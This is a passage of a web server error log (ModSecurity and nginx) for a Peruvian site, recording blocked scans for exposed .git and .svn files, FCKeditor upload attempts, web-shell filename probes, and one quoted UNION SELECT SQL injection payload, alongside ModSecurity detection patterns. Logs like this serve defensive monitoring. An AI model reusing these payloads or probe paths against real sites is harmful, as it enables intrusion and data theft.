.dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "ZaQHZRELZAUauU1Ae9hmfgAAAIE"] 2024/01/14 15:22:40 [error] 14875#14875: *7480 access forbidden by rule, client: 3.92.147.77, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/14 16:11:44 [error] 14874#14874: *7837 access forbidden by rule, client: 3.92.147.77, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/14 17:17:06 [error] 14875#14875: *8155 access forbidden by rule, client: 3.92.147.77, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Jan 15 03:32:17.538917 2024] [ssl:warn] [pid 29420:tid 140480686868352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 15 03:32:21.733417 2024] [ssl:warn] [pid 29426:tid 140480686868352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 15 03:32:22.113564 2024] [ssl:warn] [pid 29426:tid 140480686868352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 15 03:32:23.656932 2024] [ssl:warn] [pid 29426:tid 140480686868352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 15 03:32:26.006521 2024] [ssl:warn] [pid 29843:tid 140693861005184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 15 03:32:38.278276 2024] [ssl:warn] [pid 29849:tid 140693861005184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 15 07:13:38.654791 2024] [:error] [pid 30486:tid 140693448087296] [client 193.46.255.175:59402] [client 193.46.255.175] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/FCKeditor/editor/filemanager/connectors/asp/connector.asp"] [unique_id "ZaUhchR6M1RGX1sWSt73TwAAANM"], referer: http://investigacionperu.com/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F [Mon Jan 15 07:13:38.759201 2024] [:error] [pid 29871:tid 140693573977856] [client 193.46.255.175:59404] [client 193.46.255.175] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/FCKeditor/editor/filemanager/connectors/asp/connector.asp"] [unique_id "ZaUhckdfOJokJBqJhOXQ4QAAAIQ"], referer: http://investigacionperu.com/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F [Mon Jan 15 07:13:38.865385 2024] [:error] [pid 29871:tid 140693406123776] [client 193.46.255.175:59406] [client 193.46.255.175] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/FCKeditor/editor/filemanager/connectors/asp/connector.asp"] [unique_id "ZaUhckdfOJokJBqJhOXQ4gAAAJg"], referer: http://investigacionperu.com/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F [Mon Jan 15 07:13:38.971383 2024] [:error] [pid 29871:tid 140693582370560] [client 193.46.255.175:59408] [client 193.46.255.175] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/FCKeditor/editor/filemanager/connectors/asp/connector.asp"] [unique_id "ZaUhckdfOJokJBqJhOXQ4wAAAIM"], referer: http://investigacionperu.com/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F [Mon Jan 15 15:18:04.814645 2024] [:error] [pid 30486:tid 140693590763264] [client 41.216.188.162:45462] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php, referer: www.google.com [Mon Jan 15 15:18:45.617443 2024] [:error] [pid 29871:tid 140693515228928] [client 41.216.188.162:45480] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php, referer: www.google.com 2024/01/15 21:46:36 [error] 29824#29824: *29975 access forbidden by rule, client: 172.233.16.199, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jan 16 03:38:25.320201 2024] [ssl:warn] [pid 17801:tid 140478279165824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 16 03:38:31.586198 2024] [ssl:warn] [pid 17804:tid 140478279165824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 16 03:38:32.072253 2024] [ssl:warn] [pid 17804:tid 140478279165824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 16 03:38:33.693867 2024] [ssl:warn] [pid 17804:tid 140478279165824] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 16 03:38:35.970635 2024] [ssl:warn] [pid 18220:tid 140553240778624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 16 03:38:53.190891 2024] [ssl:warn] [pid 18224:tid 140553240778624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 16 12:52:22.385121 2024] [:error] [pid 18774:tid 140552880228096] [client 198.244.213.98:42350] [client 198.244.213.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZabCVsUILdPJj2DNEQiGGwAAAI0"] 2024/01/16 14:17:55 [error] 18202#18202: *40387 access forbidden by rule, client: 31.43.185.32, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Tue Jan 16 18:58:24.537834 2024] [autoindex:error] [pid 18917:tid 140552888620800] [client 192.185.4.112:49088] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/skins/wordpress/index.php 2024/01/16 22:15:25 [error] 18201#18201: *44160 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /projects/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/16 22:15:59 [error] 18202#18202: *44161 access forbidden by rule, client: 3.235.159.140, server: mail.investigacionperu.com, request: "GET /private/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/16 22:29:52 [error] 18202#18202: *44247 access forbidden by rule, client: 3.235.159.140, server: cpanel.investigacionperu.com, request: "GET /vendor/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/16 22:31:25 [error] 18202#18202: *44258 access forbidden by rule, client: 3.235.159.140, server: mail.investigacionperu.com, request: "GET /files/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/16 22:44:18 [error] 18202#18202: *44348 access forbidden by rule, client: 3.235.159.140, server: mail.investigacionperu.com, request: "GET /plugins/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/16 22:56:49 [error] 18202#18202: *44612 access forbidden by rule, client: 3.235.159.140, server: mail.investigacionperu.com, request: "GET /doc/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/16 23:04:09 [error] 18201#18201: *44635 access forbidden by rule, client: 3.235.159.140, server: mail.investigacionperu.com, request: "GET /components/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/16 23:24:16 [error] 18201#18201: *44771 access forbidden by rule, client: 3.235.159.140, server: cpanel.investigacionperu.com, request: "GET /src/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/16 23:29:04 [error] 18201#18201: *44864 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /database/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/16 23:40:17 [error] 18202#18202: *44924 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /js/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/16 23:52:13 [error] 18201#18201: *45004 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /components/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/16 23:53:05 [error] 18202#18202: *45014 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/17 00:15:35 [error] 18202#18202: *45250 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /vendor/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/17 00:30:23 [error] 18201#18201: *46118 access forbidden by rule, client: 3.235.159.140, server: mail.investigacionperu.com, request: "GET /web/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/17 00:34:46 [error] 18201#18201: *46326 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /modules/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/17 00:40:56 [error] 18201#18201: *46412 access forbidden by rule, client: 3.235.159.140, server: mail.investigacionperu.com, request: "GET /info/.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Wed Jan 17 00:46:37.461926 2024] [:error] [pid 18773:tid 140552813086464] [client 20.171.72.12:56480] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jan 17 00:46:37.527812 2024] [:error] [pid 18774:tid 140553024460544] [client 20.171.72.12:56482] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jan 17 00:47:08.092325 2024] [autoindex:error] [pid 18774:tid 140552796301056] [client 20.171.72.12:56578] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/01/17 01:04:40 [error] 18201#18201: *47396 access forbidden by rule, client: 3.235.159.140, server: cpanel.investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/17 01:13:25 [error] 18201#18201: *47473 access forbidden by rule, client: 3.235.159.140, server: cpanel.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/17 01:23:33 [error] 18202#18202: *47583 access forbidden by rule, client: 3.235.159.140, server: cpanel.investigacionperu.com, request: "GET /plugins/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/17 01:29:50 [error] 18202#18202: *47655 access forbidden by rule, client: 3.235.159.140, server: mail.investigacionperu.com, request: "GET /css/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/17 01:37:46 [error] 18202#18202: *47745 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /css/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/17 01:42:31 [error] 18202#18202: *47786 access forbidden by rule, client: 3.235.159.140, server: cpanel.investigacionperu.com, request: "GET /components/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/17 02:17:35 [error] 18202#18202: *48611 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/17 03:08:52 [error] 18201#18201: *49319 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /images/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Wed Jan 17 03:19:31.742251 2024] [ssl:warn] [pid 25456:tid 140111651829632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 17 03:19:39.952051 2024] [ssl:warn] [pid 25458:tid 140111651829632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 17 03:19:40.373880 2024] [ssl:warn] [pid 25458:tid 140111651829632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 17 03:19:42.198166 2024] [ssl:warn] [pid 25458:tid 140111651829632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 17 03:19:44.531699 2024] [ssl:warn] [pid 25905:tid 140268826609536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 17 03:19:56.744340 2024] [ssl:warn] [pid 25907:tid 140268826609536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 17 03:19:57.430374 2024] [ssl:warn] [pid 25907:tid 140268826609536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/01/17 03:44:38 [error] 26023#26023: *49637 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /server/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/17 03:54:48 [error] 26024#26024: *49785 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /www/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/17 03:55:59 [error] 26024#26024: *49786 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /info/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/17 04:16:09 [error] 26024#26024: *50011 access forbidden by rule, client: 31.43.185.32, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/17 05:01:26 [error] 26024#26024: *50480 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /config/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/17 05:06:38 [error] 26023#26023: *50516 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /core/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/17 05:07:52 [error] 26024#26024: *50527 access forbidden by rule, client: 34.222.26.176, server: webmail.investigacionperu.com, request: "GET /home/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Wed Jan 17 17:10:41.769055 2024] [autoindex:error] [pid 26677:tid 140268372150016] [client 20.219.15.11:48724] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/01/17 23:21:26 [error] 26023#26023: *63703 access forbidden by rule, client: 31.43.185.32, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Jan 18 03:49:42.587703 2024] [ssl:warn] [pid 409:tid 140151892543360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 03:49:50.799872 2024] [ssl:warn] [pid 412:tid 140151892543360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 03:49:51.313461 2024] [ssl:warn] [pid 412:tid 140151892543360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 03:49:52.996780 2024] [ssl:warn] [pid 412:tid 140151892543360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 03:49:55.305963 2024] [ssl:warn] [pid 912:tid 140154467805056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 03:50:03.530068 2024] [ssl:warn] [pid 919:tid 140154467805056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 19:04:18.653660 2024] [ssl:warn] [pid 919:tid 140154467805056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 23:22:07.941311 2024] [ssl:warn] [pid 31137:tid 140563190966144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 23:22:08.304395 2024] [ssl:warn] [pid 31139:tid 140563190966144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 23:23:24.774913 2024] [ssl:warn] [pid 31793:tid 139845386381184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 23:23:28.973257 2024] [ssl:warn] [pid 31812:tid 139845386381184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 23:28:28.854555 2024] [ssl:warn] [pid 31812:tid 139845386381184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 23:28:38.968283 2024] [ssl:warn] [pid 31812:tid 139845386381184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 23:29:29.799747 2024] [ssl:warn] [pid 31812:tid 139845386381184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 23:31:56.272544 2024] [ssl:warn] [pid 7049:tid 140703830361984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 23:32:00.515904 2024] [ssl:warn] [pid 7062:tid 140703830361984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 23:39:16.835094 2024] [ssl:warn] [pid 8735:tid 139885603215232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 18 23:39:21.017362 2024] [ssl:warn] [pid 8742:tid 139885603215232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 19 03:26:26.847910 2024] [ssl:warn] [pid 19736:tid 139798117963648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 19 03:26:35.080824 2024] [ssl:warn] [pid 19739:tid 139798117963648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 19 03:26:35.286167 2024] [ssl:warn] [pid 19739:tid 139798117963648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 19 03:26:36.795898 2024] [ssl:warn] [pid 19739:tid 139798117963648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 19 03:26:39.034092 2024] [ssl:warn] [pid 20183:tid 140247192233856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 19 03:26:45.235643 2024] [ssl:warn] [pid 20185:tid 140247192233856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/01/19 21:26:55 [error] 20066#20066: *13471 access forbidden by rule, client: 18.215.181.48, server: webmail.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/19 23:07:05 [error] 20067#20067: *14213 access forbidden by rule, client: 18.215.181.48, server: webmail.investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/19 23:30:39 [error] 20067#20067: *14518 access forbidden by rule, client: 54.89.236.116, server: cpanel.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/20 00:18:26 [error] 20067#20067: *14817 access forbidden by rule, client: 54.89.236.116, server: cpanel.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/20 01:58:49 [error] 20066#20066: *15834 access forbidden by rule, client: 18.215.181.48, server: webmail.investigacionperu.com, request: "GET /core/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/20 02:54:50 [error] 20066#20066: *16288 access forbidden by rule, client: 54.89.236.116, server: cpanel.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/20 03:39:27 [error] 20066#20066: *16652 access forbidden by rule, client: 18.215.181.48, server: webmail.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sat Jan 20 03:47:24.298709 2024] [ssl:warn] [pid 3210:tid 139918502475648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 20 03:47:32.636761 2024] [ssl:warn] [pid 3211:tid 139918502475648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 20 03:47:33.020886 2024] [ssl:warn] [pid 3211:tid 139918502475648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 20 03:47:34.704437 2024] [ssl:warn] [pid 3211:tid 139918502475648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 20 03:47:36.996416 2024] [ssl:warn] [pid 3631:tid 139821804726144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 20 03:47:45.212317 2024] [ssl:warn] [pid 3639:tid 139821804726144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/01/20 04:33:23 [error] 3529#3529: *16995 access forbidden by rule, client: 18.215.181.48, server: webmail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "webmail.investigacionperu.com" 2024/01/20 08:03:26 [error] 3528#3528: *18550 access forbidden by rule, client: 54.89.236.116, server: mail.investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sat Jan 20 10:54:06.512625 2024] [ssl:warn] [pid 3639:tid 139821804726144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 20 11:25:45.508523 2024] [ssl:warn] [pid 3639:tid 139821804726144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 20 11:27:37.108193 2024] [ssl:warn] [pid 3639:tid 139821804726144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 20 11:27:44.497483 2024] [ssl:warn] [pid 3639:tid 139821804726144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 20 11:56:09.014173 2024] [ssl:warn] [pid 3639:tid 139821804726144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 20 11:56:13.268261 2024] [ssl:warn] [pid 3639:tid 139821804726144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/01/21 00:58:04 [error] 23535#23535: *30788 access forbidden by rule, client: 34.230.36.192, server: mail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/21 01:42:38 [error] 23535#23535: *31100 access forbidden by rule, client: 34.230.36.192, server: cpanel.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Jan 21 03:10:38.618859 2024] [ssl:warn] [pid 30879:tid 139695601039232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 21 03:10:50.822251 2024] [ssl:warn] [pid 30883:tid 139695601039232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 21 03:10:51.303492 2024] [ssl:warn] [pid 30883:tid 139695601039232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 21 03:10:53.024314 2024] [ssl:warn] [pid 30883:tid 139695601039232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 21 03:10:55.298853 2024] [ssl:warn] [pid 31300:tid 140027769603968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 21 03:11:07.499603 2024] [ssl:warn] [pid 31305:tid 140027769603968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/01/21 07:40:23 [error] 31282#31282: *33905 access forbidden by rule, client: 34.230.36.192, server: mail.investigacionperu.com, request: "GET /core/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/21 08:14:03 [error] 31282#31282: *34262 access forbidden by rule, client: 34.230.36.192, server: mail.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/21 12:35:49 [error] 31282#31282: *36971 access forbidden by rule, client: 34.230.36.192, server: mail.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/01/21 14:43:54 [error] 31281#31281: *38187 access forbidden by rule, client: 34.230.36.192, server: cpanel.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/21 14:46:11 [error] 31281#31281: *38202 access forbidden by rule, client: 34.230.36.192, server: cpanel.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/01/21 15:45:59 [error] 31281#31281: *38774 access forbidden by rule, client: 34.230.36.192, server: cpanel.investigacionperu.com, request: "GET /core/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Jan 21 18:17:04.275010 2024] [:error] [pid 32332:tid 140027476571904] [client 51.68.11.231:37276] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php, referer: http://simplesite.com 2024/01/21 19:48:14 [error] 31282#31282: *42752 access forbidden by rule, client: 34.230.36.192, server: cpanel.investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Jan 21 20:02:49.968422 2024] [:error] [pid 32332:tid 